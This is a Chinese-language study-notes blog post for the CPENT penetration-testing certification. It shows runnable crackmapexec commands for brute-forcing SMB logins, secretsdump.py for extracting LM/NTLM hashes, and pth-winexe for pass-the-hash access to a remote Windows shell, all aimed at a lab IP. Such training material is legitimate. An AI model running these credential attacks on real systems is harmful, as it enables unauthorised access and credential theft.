iT邦幫忙

2023 iThome 鐵人賽

DAY 28
0
Security

滲透測試小白的 CPENT 證照學習筆記系列 第 28

Crackmapexec 爆破 SMB

  • 分享至 

  • xImage
  •  

crackmapexec(簡稱CME)是一個用於渗透測試和紅隊操作的自動化工具。它是一個功能豐富的命令行工具,用於快速而有效地執行各種渗透測試和攻擊,特別是針對Windows環境。

  • 安裝 crackmapexec
    crackmapexec 有用到 impacket 套件,先查看 impacket 版本,太舊要升級,建議 impacket 0.10.0 以上。
    python3 -m pip list | grep impacket
    image.png

    升級
    python3 -m pip install  --upgrade impacket
    image.png

  • 使用 crackmapexec 工具針對 SMB 服務執行弱帳密破解攻擊的命令
    crackmapexec smb 192.168.0.7 -u Wordlists/Usernames.txt -p 'Pa$$w0rd'
    image.png

  • 得到帳密後,可以利用 winexe 工具登入到 Windows 的 CMD。
    image.png

  • 取得帳密後,也可以做橫移攻擊
    先提取 LM 和 NTLM 雜湊
    secretsdump.py 'administrator:Pa$$word'@192.168.0.7
    image.png

  • 使用先前提取的 LM 雜湊和 NTLM 雜湊來進行身份驗證,然後在遠端 Windows 主機上運行命令。
    pth-winexe –U 'Username%<LM_hash:NTLM_hash>' //<IP> cmd.exe
    image.png
    登入成功!


上一篇
Onesixtyone - SNMP 列舉
下一篇
SSH 漏洞利用
系列文
滲透測試小白的 CPENT 證照學習筆記30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言